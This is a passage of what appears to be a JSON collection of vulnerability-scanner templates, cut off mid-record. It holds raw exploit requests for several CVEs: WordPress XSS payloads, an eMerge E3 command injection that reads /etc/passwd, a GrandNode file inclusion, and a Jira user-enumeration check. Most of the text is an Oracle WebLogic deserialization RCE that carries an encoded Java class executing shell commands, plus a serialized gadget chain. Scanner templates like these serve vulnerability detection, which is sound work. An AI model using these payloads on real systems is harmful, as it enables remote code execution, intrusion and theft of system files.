Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-json/visualizer/v1/update-chart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": 7, \"visualizer-chart-type\": \"<script>alert(document.domain)</script>\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":\"Chart updated\"}"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7256","info":{"name":"eMerge E3 1.00-06 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15889","info":{"name":"WordPress Download Manager <2.9.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/download-manager/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Download Manager","License:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12276","info":{"name":"GrandNode 4.40 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"],"headers":{"Connection":"close"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3403","info":{"name":"Jira - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/2/user/picker?query="],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","contains_any(body, \"\\\"users\\\":\",\"\\\"usuario\\\":\")","contains_all(body, \"\\\"total\\\":\", \"\\\"header\\\":\")","status_code == 200 || status_code == 404"],"condition":"and"},{"type":"word","part":"body","words":["total\":0"],"negative":true}]}]},{"id":"CVE-2019-2729","info":{"name":"Oracle WebLogic Server Administration Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","POST /_async/AsyncResponseService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><array method=\"forName\"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"3478\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>6</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>91</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>10</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>98</byte></void><void index=\"201\"><byte>121</byte></void><void index=\"202\"><byte>116</byte></void><void index=\"203\"><byte>101</byte></void><void index=\"204\"><byte>99</byte></void><void index=\"205\"><byte>111</byte></void><void index=\"206\"><byte>100</byte></void><void index=\"207\"><byte>101</byte></void><void index=\"208\"><byte>115</byte></void><void index=\"209\"><byte>116</byte></void><void index=\"210\"><byte>0</byte></void><void index=\"211\"><byte>3</byte></void><void index=\"212\"><byte>91</byte></void><void index=\"213\"><byte>91</byte></void><void index=\"214\"><byte>66</byte></void><void index=\"215\"><byte>91</byte></void><void index=\"216\"><byte>0</byte></void><void index=\"217\"><byte>6</byte></void><void index=\"218\"><byte>95</byte></void><void index=\"219\"><byte>99</byte></void><void index=\"220\"><byte>108</byte></void><void index=\"221\"><byte>97</byte></void><void index=\"222\"><byte>115</byte></void><void index=\"223\"><byte>115</byte></void><void index=\"224\"><byte>116</byte></void><void index=\"225\"><byte>0</byte></void><void index=\"226\"><byte>18</byte></void><void index=\"227\"><byte>91</byte></void><void index=\"228\"><byte>76</byte></void><void index=\"229\"><byte>106</byte></void><void index=\"230\"><byte>97</byte></void><void index=\"231\"><byte>118</byte></void><void index=\"232\"><byte>97</byte></void><void index=\"233\"><byte>47</byte></void><void index=\"234\"><byte>108</byte></void><void index=\"235\"><byte>97</byte></void><void index=\"236\"><byte>110</byte></void><void index=\"237\"><byte>103</byte></void><void index=\"238\"><byte>47</byte></void><void index=\"239\"><byte>67</byte></void><void index=\"240\"><byte>108</byte></void><void index=\"241\"><byte>97</byte></void><void index=\"242\"><byte>115</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>59</byte></void><void index=\"245\"><byte>76</byte></void><void index=\"246\"><byte>0</byte></void><void index=\"247\"><byte>5</byte></void><void index=\"248\"><byte>95</byte></void><void index=\"249\"><byte>110</byte></void><void index=\"250\"><byte>97</byte></void><void index=\"251\"><byte>109</byte></void><void index=\"252\"><byte>101</byte></void><void index=\"253\"><byte>116</byte></void><void index=\"254\"><byte>0</byte></void><void index=\"255\"><byte>18</byte></void><void index=\"256\"><byte>76</byte></void><void index=\"257\"><byte>106</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>118</byte></void><void index=\"260\"><byte>97</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>108</byte></void><void index=\"263\"><byte>97</byte></void><void index=\"264\"><byte>110</byte></void><void index=\"265\"><byte>103</byte></void><void index=\"266\"><byte>47</byte></void><void index=\"267\"><byte>83</byte></void><void index=\"268\"><byte>116</byte></void><void index=\"269\"><byte>114</byte></void><void index=\"270\"><byte>105</byte></void><void index=\"271\"><byte>110</byte></void><void index=\"272\"><byte>103</byte></void><void index=\"273\"><byte>59</byte></void><void index=\"274\"><byte>76</byte></void><void index=\"275\"><byte>0</byte></void><void index=\"276\"><byte>17</byte></void><void index=\"277\"><byte>95</byte></void><void index=\"278\"><byte>111</byte></void><void index=\"279\"><byte>117</byte></void><void index=\"280\"><byte>116</byte></void><void index=\"281\"><byte>112</byte></void><void index=\"282\"><byte>117</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>80</byte></void><void index=\"285\"><byte>114</byte></void><void index=\"286\"><byte>111</byte></void><void index=\"287\"><byte>112</byte></void><void index=\"288\"><byte>101</byte></void><void index=\"289\"><byte>114</byte></void><void index=\"290\"><byte>116</byte></void><void index=\"291\"><byte>105</byte></void><void index=\"292\"><byte>101</byte></void><void index=\"293\"><byte>115</byte></void><void index=\"294\"><byte>116</byte></void><void index=\"295\"><byte>0</byte></void><void index=\"296\"><byte>22</byte></void><void index=\"297\"><byte>76</byte></void><void index=\"298\"><byte>106</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>118</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>47</byte></void><void index=\"303\"><byte>117</byte></void><void index=\"304\"><byte>116</byte></void><void index=\"305\"><byte>105</byte></void><void index=\"306\"><byte>108</byte></void><void index=\"307\"><byte>47</byte></void><void index=\"308\"><byte>80</byte></void><void index=\"309\"><byte>114</byte></void><void index=\"310\"><byte>111</byte></void><void index=\"311\"><byte>112</byte></void><void index=\"312\"><byte>101</byte></void><void index=\"313\"><byte>114</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>105</byte></void><void index=\"316\"><byte>101</byte></void><void index=\"317\"><byte>115</byte></void><void index=\"318\"><byte>59</byte></void><void index=\"319\"><byte>120</byte></void><void index=\"320\"><byte>112</byte></void><void index=\"321\"><byte>0</byte></void><void index=\"322\"><byte>0</byte></void><void index=\"323\"><byte>0</byte></void><void index=\"324\"><byte>0</byte></void><void index=\"325\"><byte>-1</byte></void><void index=\"326\"><byte>-1</byte></void><void index=\"327\"><byte>-1</byte></void><void index=\"328\"><byte>-1</byte></void><void index=\"329\"><byte>117</byte></void><void index=\"330\"><byte>114</byte></void><void index=\"331\"><byte>0</byte></void><void index=\"332\"><byte>3</byte></void><void index=\"333\"><byte>91</byte></void><void index=\"334\"><byte>91</byte></void><void index=\"335\"><byte>66</byte></void><void index=\"336\"><byte>75</byte></void><void index=\"337\"><byte>-3</byte></void><void index=\"338\"><byte>25</byte></void><void index=\"339\"><byte>21</byte></void><void index=\"340\"><byte>103</byte></void><void index=\"341\"><byte>103</byte></void><void index=\"342\"><byte>-37</byte></void><void index=\"343\"><byte>55</byte></void><void index=\"344\"><byte>2</byte></void><void index=\"345\"><byte>0</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>120</byte></void><void index=\"348\"><byte>112</byte></void><void index=\"349\"><byte>0</byte></void><void index=\"350\"><byte>0</byte></void><void index=\"351\"><byte>0</byte></void><void index=\"352\"><byte>2</byte></void><void index=\"353\"><byte>117</byte></void><void index=\"354\"><byte>114</byte></void><void index=\"355\"><byte>0</byte></void><void index=\"356\"><byte>2</byte></void><void index=\"357\"><byte>91</byte></void><void index=\"358\"><byte>66</byte></void><void index=\"359\"><byte>-84</byte></void><void index=\"360\"><byte>-13</byte></void><void index=\"361\"><byte>23</byte></void><void index=\"362\"><byte>-8</byte></void><void index=\"363\"><byte>6</byte></void><void index=\"364\"><byte>8</byte></void><void index=\"365\"><byte>84</byte></void><void index=\"366\"><byte>-32</byte></void><void index=\"367\"><byte>2</byte></void><void index=\"368\"><byte>0</byte></void><void index=\"369\"><byte>0</byte></void><void index=\"370\"><byte>120</byte></void><void index=\"371\"><byte>112</byte></void><void index=\"372\"><byte>0</byte></void><void index=\"373\"><byte>0</byte></void><void index=\"374\"><byte>8</byte></void><void index=\"375\"><byte>-82</byte></void><void index=\"376\"><byte>-54</byte></void><void index=\"377\"><byte>-2</byte></void><void index=\"378\"><byte>-70</byte></void><void index=\"379\"><byte>-66</byte></void><void index=\"380\"><byte>0</byte></void><void index=\"381\"><byte>0</byte></void><void index=\"382\"><byte>0</byte></void><void index=\"383\"><byte>50</byte></void><void index=\"384\"><byte>0</byte></void><void index=\"385\"><byte>99</byte></void><void index=\"386\"><byte>10</byte></void><void index=\"387\"><byte>0</byte></void><void index=\"388\"><byte>3</byte></void><void index=\"389\"><byte>0</byte></void><void index=\"390\"><byte>34</byte></void><void index=\"391\"><byte>7</byte></void><void index=\"392\"><byte>0</byte></void><void index=\"393\"><byte>97</byte></void><void index=\"394\"><byte>7</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>37</byte></void><void index=\"397\"><byte>7</byte></void><void index=\"398\"><byte>0</byte></void><void index=\"399\"><byte>38</byte></void><void index=\"400\"><byte>1</byte></void><void index=\"401\"><byte>0</byte></void><void index=\"402\"><byte>16</byte></void><void index=\"403\"><byte>115</byte></void><void index=\"404\"><byte>101</byte></void><void index=\"405\"><byte>114</byte></void><void index=\"406\"><byte>105</byte></void><void index=\"407\"><byte>97</byte></void><void index=\"408\"><byte>108</byte></void><void index=\"409\"><byte>86</byte></void><void index=\"410\"><byte>101</byte></void><void index=\"411\"><byte>114</byte></void><void index=\"412\"><byte>115</byte></void><void index=\"413\"><byte>105</byte></void><void index=\"414\"><byte>111</byte></void><void index=\"415\"><byte>110</byte></void><void index=\"416\"><byte>85</byte></void><void index=\"417\"><byte>73</byte></void><void index=\"418\"><byte>68</byte></void><void index=\"419\"><byte>1</byte></void><void index=\"420\"><byte>0</byte></void><void index=\"421\"><byte>1</byte></void><void index=\"422\"><byte>74</byte></void><void index=\"423\"><byte>1</byte></void><void index=\"424\"><byte>0</byte></void><void index=\"425\"><byte>13</byte></void><void index=\"426\"><byte>67</byte></void><void index=\"427\"><byte>111</byte></void><void index=\"428\"><byte>110</byte></void><void index=\"429\"><byte>115</byte></void><void index=\"430\"><byte>116</byte></void><void index=\"431\"><byte>97</byte></void><void index=\"432\"><byte>110</byte></void><void index=\"433\"><byte>116</byte></void><void index=\"434\"><byte>86</byte></void><void index=\"435\"><byte>97</byte></void><void index=\"436\"><byte>108</byte></void><void index=\"437\"><byte>117</byte></void><void index=\"438\"><byte>101</byte></void><void index=\"439\"><byte>5</byte></void><void index=\"440\"><byte>-83</byte></void><void index=\"441\"><byte>32</byte></void><void index=\"442\"><byte>-109</byte></void><void index=\"443\"><byte>-13</byte></void><void index=\"444\"><byte>-111</byte></void><void index=\"445\"><byte>-35</byte></void><void index=\"446\"><byte>-17</byte></void><void index=\"447\"><byte>62</byte></void><void index=\"448\"><byte>1</byte></void><void index=\"449\"><byte>0</byte></void><void index=\"450\"><byte>6</byte></void><void index=\"451\"><byte>60</byte></void><void index=\"452\"><byte>105</byte></void><void index=\"453\"><byte>110</byte></void><void index=\"454\"><byte>105</byte></void><void index=\"455\"><byte>116</byte></void><void index=\"456\"><byte>62</byte></void><void index=\"457\"><byte>1</byte></void><void index=\"458\"><byte>0</byte></void><void index=\"459\"><byte>3</byte></void><void index=\"460\"><byte>40</byte></void><void index=\"461\"><byte>41</byte></void><void index=\"462\"><byte>86</byte></void><void index=\"463\"><byte>1</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>4</byte></void><void index=\"466\"><byte>67</byte></void><void index=\"467\"><byte>111</byte></void><void index=\"468\"><byte>100</byte></void><void index=\"469\"><byte>101</byte></void><void index=\"470\"><byte>1</byte></void><void index=\"471\"><byte>0</byte></void><void index=\"472\"><byte>15</byte></void><void index=\"473\"><byte>76</byte></void><void index=\"474\"><byte>105</byte></void><void index=\"475\"><byte>110</byte></void><void index=\"476\"><byte>101</byte></void><void index=\"477\"><byte>78</byte></void><void index=\"478\"><byte>117</byte></void><void index=\"479\"><byte>109</byte></void><void index=\"480\"><byte>98</byte></void><void index=\"481\"><byte>101</byte></void><void index=\"482\"><byte>114</byte></void><void index=\"483\"><byte>84</byte></void><void index=\"484\"><byte>97</byte></void><void index=\"485\"><byte>98</byte></void><void index=\"486\"><byte>108</byte></void><void index=\"487\"><byte>101</byte></void><void index=\"488\"><byte>1</byte></void><void index=\"489\"><byte>0</byte></void><void index=\"490\"><byte>18</byte></void><void index=\"491\"><byte>76</byte></void><void index=\"492\"><byte>111</byte></void><void index=\"493\"><byte>99</byte></void><void index=\"494\"><byte>97</byte></void><void index=\"495\"><byte>108</byte></void><void index=\"496\"><byte>86</byte></void><void index=\"497\"><byte>97</byte></void><void index=\"498\"><byte>114</byte></void><void index=\"499\"><byte>105</byte></void><void index=\"500\"><byte>97</byte></void><void index=\"501\"><byte>98</byte></void><void index=\"502\"><byte>108</byte></void><void index=\"503\"><byte>101</byte></void><void index=\"504\"><byte>84</byte></void><void index=\"505\"><byte>97</byte></void><void index=\"506\"><byte>98</byte></void><void index=\"507\"><byte>108</byte></void><void index=\"508\"><byte>101</byte></void><void index=\"509\"><byte>1</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>4</byte></void><void index=\"512\"><byte>116</byte></void><void index=\"513\"><byte>104</byte></void><void index=\"514\"><byte>105</byte></void><void index=\"515\"><byte>115</byte></void><void index=\"516\"><byte>1</byte></void><void index=\"517\"><byte>0</byte></void><void index=\"518\"><byte>19</byte></void><void index=\"519\"><byte>83</byte></void><void index=\"520\"><byte>116</byte></void><void index=\"521\"><byte>117</byte></void><void index=\"522\"><byte>98</byte></void><void index=\"523\"><byte>84</byte></void><void index=\"524\"><byte>114</byte></void><void index=\"525\"><byte>97</byte></void><void index=\"526\"><byte>110</byte></void><void index=\"527\"><byte>115</byte></void><void index=\"528\"><byte>108</byte></void><void index=\"529\"><byte>101</byte></void><void index=\"530\"><byte>116</byte></void><void index=\"531\"><byte>80</byte></void><void index=\"532\"><byte>97</byte></void><void index=\"533\"><byte>121</byte></void><void index=\"534\"><byte>108</byte></void><void index=\"535\"><byte>111</byte></void><void index=\"536\"><byte>97</byte></void><void index=\"537\"><byte>100</byte></void><void index=\"538\"><byte>1</byte></void><void 